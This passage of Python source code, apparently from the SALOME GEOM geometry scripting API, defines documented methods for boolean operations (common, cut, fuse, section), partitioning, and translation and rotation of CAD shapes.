# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fuse "Example"
@ManageTransactions("BoolOp")
def MakeBoolean(self, theShape1, theShape2, theOperation, checkSelfInte=False, theName=None):
"""
Perform one of boolean operations on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
theOperation Indicates the operation to be done:
1 - Common, 2 - Cut, 3 - Fuse, 4 - Section.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.BoolOp.MakeBoolean(theShape1, theShape2, theOperation, checkSelfInte)
RaiseIfFailed("MakeBoolean", self.BoolOp)
def_names = { 1: "common", 2: "cut", 3: "fuse", 4: "section" }
self._autoPublish(anObj, theName, def_names[theOperation])
return anObj
## Perform Common boolean operation on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_common "Example 1"
# \n @ref swig_MakeCommon "Example 2"
def MakeCommon(self, theShape1, theShape2, checkSelfInte=False, theName=None):
"""
Perform Common boolean operation on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakeBoolean()
return self.MakeBoolean(theShape1, theShape2, 1, checkSelfInte, theName)
## Perform Cut boolean operation on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_cut "Example 1"
# \n @ref swig_MakeCommon "Example 2"
def MakeCut(self, theShape1, theShape2, checkSelfInte=False, theName=None):
"""
Perform Cut boolean operation on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakeBoolean()
return self.MakeBoolean(theShape1, theShape2, 2, checkSelfInte, theName)
## Perform Fuse boolean operation on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param rmExtraEdges The flag that tells if Remove Extra Edges
# operation should be performed during the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fuse "Example 1"
# \n @ref swig_MakeCommon "Example 2"
@ManageTransactions("BoolOp")
def MakeFuse(self, theShape1, theShape2, checkSelfInte=False,
rmExtraEdges=False, theName=None):
"""
Perform Fuse boolean operation on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
rmExtraEdges The flag that tells if Remove Extra Edges
operation should be performed during the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BoolOp.MakeFuse(theShape1, theShape2,
checkSelfInte, rmExtraEdges)
RaiseIfFailed("MakeFuse", self.BoolOp)
self._autoPublish(anObj, theName, "fuse")
return anObj
## Perform Section boolean operation on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_section "Example 1"
# \n @ref swig_MakeCommon "Example 2"
def MakeSection(self, theShape1, theShape2, checkSelfInte=False, theName=None):
"""
Perform Section boolean operation on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakeBoolean()
return self.MakeBoolean(theShape1, theShape2, 4, checkSelfInte, theName)
## Perform Fuse boolean operation on the list of shapes.
# @param theShapesList Shapes to be fused.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param rmExtraEdges The flag that tells if Remove Extra Edges
# operation should be performed during the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fuse "Example 1"
# \n @ref swig_MakeCommon "Example 2"
@ManageTransactions("BoolOp")
def MakeFuseList(self, theShapesList, checkSelfInte=False,
rmExtraEdges=False, theName=None):
"""
Perform Fuse boolean operation on the list of shapes.
Parameters:
theShapesList Shapes to be fused.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
rmExtraEdges The flag that tells if Remove Extra Edges
operation should be performed during the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BoolOp.MakeFuseList(theShapesList, checkSelfInte,
rmExtraEdges)
RaiseIfFailed("MakeFuseList", self.BoolOp)
self._autoPublish(anObj, theName, "fuse")
return anObj
## Perform Common boolean operation on the list of shapes.
# @param theShapesList Shapes for Common operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_common "Example 1"
# \n @ref swig_MakeCommon "Example 2"
@ManageTransactions("BoolOp")
def MakeCommonList(self, theShapesList, checkSelfInte=False, theName=None):
"""
Perform Common boolean operation on the list of shapes.
Parameters:
theShapesList Shapes for Common operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BoolOp.MakeCommonList(theShapesList, checkSelfInte)
RaiseIfFailed("MakeCommonList", self.BoolOp)
self._autoPublish(anObj, theName, "common")
return anObj
## Perform Cut boolean operation on one object and the list of tools.
# @param theMainShape The object of the operation.
# @param theShapesList The list of tools of the operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_cut "Example 1"
# \n @ref swig_MakeCommon "Example 2"
@ManageTransactions("BoolOp")
def MakeCutList(self, theMainShape, theShapesList, checkSelfInte=False, theName=None):
"""
Perform Cut boolean operation on one object and the list of tools.
Parameters:
theMainShape The object of the operation.
theShapesList The list of tools of the operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BoolOp.MakeCutList(theMainShape, theShapesList, checkSelfInte)
RaiseIfFailed("MakeCutList", self.BoolOp)
self._autoPublish(anObj, theName, "cut")
return anObj
# end of l3_boolean
## @}
## @addtogroup l3_basic_op
## @{
## Perform partition operation.
# @param ListShapes Shapes to be intersected.
# @param ListTools Shapes to intersect theShapes.
# @param Limit Type of resulting shapes (see ShapeType()).\n
# If this parameter is set to -1 ("Auto"), most appropriate shape limit
# type will be detected automatically.
# @param KeepNonlimitShapes if this parameter == 0, then only shapes of
# target type (equal to Limit) are kept in the result,
# else standalone shapes of lower dimension
# are kept also (if they exist).
#
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Each compound from ListShapes and ListTools will be exploded
# in order to avoid possible intersection between shapes from this compound.
#
# After implementation new version of PartitionAlgo (October 2006)
# other parameters are ignored by current functionality. They are kept
# in this function only for support old versions.
# @param ListKeepInside Shapes, outside which the results will be deleted.
# Each shape from theKeepInside must belong to theShapes also.
# @param ListRemoveInside Shapes, inside which the results will be deleted.
# Each shape from theRemoveInside must belong to theShapes also.
# @param RemoveWebs If TRUE, perform Glue 3D algorithm.
# @param ListMaterials Material indices for each shape. Make sence,
# only if theRemoveWebs is TRUE.
#
# @return New GEOM.GEOM_Object, containing the result shapes.
#
# @ref tui_partition "Example"
@ManageTransactions("BoolOp")
def MakePartition(self, ListShapes, ListTools=[], ListKeepInside=[], ListRemoveInside=[],
Limit=ShapeType["AUTO"], RemoveWebs=0, ListMaterials=[],
KeepNonlimitShapes=0, theName=None):
"""
Perform partition operation.
Parameters:
ListShapes Shapes to be intersected.
ListTools Shapes to intersect theShapes.
Limit Type of resulting shapes (see geompy.ShapeType)
If this parameter is set to -1 ("Auto"), most appropriate shape limit
type will be detected automatically.
KeepNonlimitShapes if this parameter == 0, then only shapes of
target type (equal to Limit) are kept in the result,
else standalone shapes of lower dimension
are kept also (if they exist).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Each compound from ListShapes and ListTools will be exploded
in order to avoid possible intersection between shapes from
this compound.
After implementation new version of PartitionAlgo (October 2006) other
parameters are ignored by current functionality. They are kept in this
function only for support old versions.
Ignored parameters:
ListKeepInside Shapes, outside which the results will be deleted.
Each shape from theKeepInside must belong to theShapes also.
ListRemoveInside Shapes, inside which the results will be deleted.
Each shape from theRemoveInside must belong to theShapes also.
RemoveWebs If TRUE, perform Glue 3D algorithm.
ListMaterials Material indices for each shape. Make sence, only if theRemoveWebs is TRUE.
Returns:
New GEOM.GEOM_Object, containing the result shapes.
"""
# Example: see GEOM_TestAll.py
if Limit == self.ShapeType["AUTO"]:
# automatic detection of the most appropriate shape limit type
lim = GEOM.SHAPE
for s in ListShapes: lim = min( lim, s.GetMaxShapeType() )
Limit = EnumToLong(lim)
pass
anObj = self.BoolOp.MakePartition(ListShapes, ListTools,
ListKeepInside, ListRemoveInside,
Limit, RemoveWebs, ListMaterials,
KeepNonlimitShapes);
RaiseIfFailed("MakePartition", self.BoolOp)
self._autoPublish(anObj, theName, "partition")
return anObj
## Perform partition operation.
# This method may be useful if it is needed to make a partition for
# compound contains nonintersected shapes. Performance will be better
# since intersection between shapes from compound is not performed.
#
# Description of all parameters as in previous method MakePartition().
# One additional parameter is provided:
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @note Passed compounds (via ListShapes or via ListTools)
# have to consist of nonintersecting shapes.
#
# @return New GEOM.GEOM_Object, containing the result shapes.
#
# @ref swig_todo "Example"
@ManageTransactions("BoolOp")
def MakePartitionNonSelfIntersectedShape(self, ListShapes, ListTools=[],
ListKeepInside=[], ListRemoveInside=[],
Limit=ShapeType["AUTO"], RemoveWebs=0,
ListMaterials=[], KeepNonlimitShapes=0,
checkSelfInte=False, theName=None):
"""
Perform partition operation.
This method may be useful if it is needed to make a partition for
compound contains nonintersected shapes. Performance will be better
since intersection between shapes from compound is not performed.
Parameters:
Description of all parameters as in method geompy.MakePartition.
One additional parameter is provided:
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
NOTE:
Passed compounds (via ListShapes or via ListTools)
have to consist of nonintersecting shapes.
Returns:
New GEOM.GEOM_Object, containing the result shapes.
"""
if Limit == self.ShapeType["AUTO"]:
# automatic detection of the most appropriate shape limit type
lim = GEOM.SHAPE
for s in ListShapes: lim = min( lim, s.GetMaxShapeType() )
Limit = EnumToLong(lim)
pass
anObj = self.BoolOp.MakePartitionNonSelfIntersectedShape(ListShapes, ListTools,
ListKeepInside, ListRemoveInside,
Limit, RemoveWebs, ListMaterials,
KeepNonlimitShapes, checkSelfInte);
RaiseIfFailed("MakePartitionNonSelfIntersectedShape", self.BoolOp)
self._autoPublish(anObj, theName, "partition")
return anObj
## See method MakePartition() for more information.
#
# @ref tui_partition "Example 1"
# \n @ref swig_Partition "Example 2"
def Partition(self, ListShapes, ListTools=[], ListKeepInside=[], ListRemoveInside=[],
Limit=ShapeType["AUTO"], RemoveWebs=0, ListMaterials=[],
KeepNonlimitShapes=0, theName=None):
"""
See method geompy.MakePartition for more information.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakePartition()
anObj = self.MakePartition(ListShapes, ListTools,
ListKeepInside, ListRemoveInside,
Limit, RemoveWebs, ListMaterials,
KeepNonlimitShapes, theName);
return anObj
## Perform partition of the Shape with the Plane
# @param theShape Shape to be intersected.
# @param thePlane Tool shape, to intersect theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_partition "Example"
@ManageTransactions("BoolOp")
def MakeHalfPartition(self, theShape, thePlane, theName=None):
"""
Perform partition of the Shape with the Plane
Parameters:
theShape Shape to be intersected.
thePlane Tool shape, to intersect theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.BoolOp.MakeHalfPartition(theShape, thePlane)
RaiseIfFailed("MakeHalfPartition", self.BoolOp)
self._autoPublish(anObj, theName, "partition")
return anObj
# end of l3_basic_op
## @}
## @addtogroup l3_transform
## @{
## Translate the given object along the vector, specified
# by its end points.
# @param theObject The object to be translated.
# @param thePoint1 Start point of translation vector.
# @param thePoint2 End point of translation vector.
# @param theCopy Flag used to translate object itself or create a copy.
# @return Translated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the translated object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def TranslateTwoPoints(self, theObject, thePoint1, thePoint2, theCopy=False):
"""
Translate the given object along the vector, specified by its end points.
Parameters:
theObject The object to be translated.
thePoint1 Start point of translation vector.
thePoint2 End point of translation vector.
theCopy Flag used to translate object itself or create a copy.
Returns:
Translated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the translated object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.TranslateTwoPointsCopy(theObject, thePoint1, thePoint2)
else:
anObj = self.TrsfOp.TranslateTwoPoints(theObject, thePoint1, thePoint2)
RaiseIfFailed("TranslateTwoPoints", self.TrsfOp)
return anObj
## Translate the given object along the vector, specified
# by its end points, creating its copy before the translation.
# @param theObject The object to be translated.
# @param thePoint1 Start point of translation vector.
# @param thePoint2 End point of translation vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the translated object.
#
# @ref tui_translation "Example 1"
# \n @ref swig_MakeTranslationTwoPoints "Example 2"
@ManageTransactions("TrsfOp")
def MakeTranslationTwoPoints(self, theObject, thePoint1, thePoint2, theName=None):
"""
Translate the given object along the vector, specified
by its end points, creating its copy before the translation.
Parameters:
theObject The object to be translated.
thePoint1 Start point of translation vector.
thePoint2 End point of translation vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the translated object.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.TranslateTwoPointsCopy(theObject, thePoint1, thePoint2)
RaiseIfFailed("TranslateTwoPointsCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "translated")
return anObj
## Translate the given object along the vector, specified by its components.
# @param theObject The object to be translated.
# @param theDX,theDY,theDZ Components of translation vector.
# @param theCopy Flag used to translate object itself or create a copy.
# @return Translated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the translated object if @a theCopy flag is @c True.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def TranslateDXDYDZ(self, theObject, theDX, theDY, theDZ, theCopy=False):
"""
Translate the given object along the vector, specified by its components.
Parameters:
theObject The object to be translated.
theDX,theDY,theDZ Components of translation vector.
theCopy Flag used to translate object itself or create a copy.
Returns:
Translated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the translated object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
theDX, theDY, theDZ, Parameters = ParseParameters(theDX, theDY, theDZ)
if theCopy:
anObj = self.TrsfOp.TranslateDXDYDZCopy(theObject, theDX, theDY, theDZ)
else:
anObj = self.TrsfOp.TranslateDXDYDZ(theObject, theDX, theDY, theDZ)
anObj.SetParameters(Parameters)
RaiseIfFailed("TranslateDXDYDZ", self.TrsfOp)
return anObj
## Translate the given object along the vector, specified
# by its components, creating its copy before the translation.
# @param theObject The object to be translated.
# @param theDX,theDY,theDZ Components of translation vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the translated object.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def MakeTranslation(self,theObject, theDX, theDY, theDZ, theName=None):
"""
Translate the given object along the vector, specified
by its components, creating its copy before the translation.
Parameters:
theObject The object to be translated.
theDX,theDY,theDZ Components of translation vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the translated object.
"""
# Example: see GEOM_TestAll.py
theDX, theDY, theDZ, Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.TrsfOp.TranslateDXDYDZCopy(theObject, theDX, theDY, theDZ)
anObj.SetParameters(Parameters)
RaiseIfFailed("TranslateDXDYDZ", self.TrsfOp)
self._autoPublish(anObj, theName, "translated")
return anObj
## Translate the given object along the given vector.
# @param theObject The object to be translated.
# @param theVector The translation vector.
# @param theCopy Flag used to translate object itself or create a copy.
# @return Translated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the translated object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def TranslateVector(self, theObject, theVector, theCopy=False):
"""
Translate the given object along the given vector.
Parameters:
theObject The object to be translated.
theVector The translation vector.
theCopy Flag used to translate object itself or create a copy.
Returns:
Translated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the translated object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.TranslateVectorCopy(theObject, theVector)
else:
anObj = self.TrsfOp.TranslateVector(theObject, theVector)
RaiseIfFailed("TranslateVector", self.TrsfOp)
return anObj
## Translate the given object along the given vector,
# creating its copy before the translation.
# @param theObject The object to be translated.
# @param theVector The translation vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the translated object.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def MakeTranslationVector(self, theObject, theVector, theName=None):
"""
Translate the given object along the given vector,
creating its copy before the translation.
Parameters:
theObject The object to be translated.
theVector The translation vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the translated object.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.TranslateVectorCopy(theObject, theVector)
RaiseIfFailed("TranslateVectorCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "translated")
return anObj
## Translate the given object along the given vector on given distance.
# @param theObject The object to be translated.
# @param theVector The translation vector.
# @param theDistance The translation distance.
# @param theCopy Flag used to translate object itself or create a copy.
# @return Translated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the translated object if @a theCopy flag is @c True.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def TranslateVectorDistance(self, theObject, theVector, theDistance, theCopy=False):
"""
Translate the given object along the given vector on given distance.
Parameters:
theObject The object to be translated.
theVector The translation vector.
theDistance The translation distance.
theCopy Flag used to translate object itself or create a copy.
Returns:
Translated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the translated object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
theDistance,Parameters = ParseParameters(theDistance)
anObj = self.TrsfOp.TranslateVectorDistance(theObject, theVector, theDistance, theCopy)
RaiseIfFailed("TranslateVectorDistance", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Translate the given object along the given vector on given distance,
# creating its copy before the translation.
# @param theObject The object to be translated.
# @param theVector The translation vector.
# @param theDistance The translation distance.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the translated object.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def MakeTranslationVectorDistance(self, theObject, theVector, theDistance, theName=None):
"""
Translate the given object along the given vector on given distance,
creating its copy before the translation.
Parameters:
theObject The object to be translated.
theVector The translation vector.
theDistance The translation distance.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the translated object.
"""
# Example: see GEOM_TestAll.py
theDistance,Parameters = ParseParameters(theDistance)
anObj = self.TrsfOp.TranslateVectorDistance(theObject, theVector, theDistance, 1)
RaiseIfFailed("TranslateVectorDistance", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "translated")
return anObj
## Rotate the given object around the given axis on the given angle.
# @param theObject The object to be rotated.
# @param theAxis Rotation axis.
# @param theAngle Rotation angle in radians.
# @param theCopy Flag used to rotate object itself or create a copy.
#
# @return Rotated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the rotated object if @a theCopy flag is @c True.
#
# @ref tui_rotation "Example"
@ManageTransactions("TrsfOp")
def Rotate(self, theObject, theAxis, theAngle, theCopy=False):
"""
Rotate the given object around the given axis on the given angle.
Parameters:
theObject The object to be rotated.
theAxis Rotation axis.
theAngle Rotation angle in radians.
theCopy Flag used to rotate object itself or create a copy.
Returns:
Rotated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the rotated object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
flag = False
if isinstance(theAngle,str):
flag = True
theAngle, Parameters = ParseParameters(theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
if theCopy:
anObj = self.TrsfOp.RotateCopy(theObject, theAxis, theAngle)
else:
anObj = self.TrsfOp.Rotate(theObject, theAxis, theAngle)
RaiseIfFailed("Rotate", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Rotate the given object around the given axis
# on the given angle, creating its copy before the rotation.
# @param theObject The object to be rotated.
# @param theAxis Rotation axis.
# @param theAngle Rotation angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the rotated object.
#
# @ref tui_rotation "Example"
@ManageTransactions("TrsfOp")
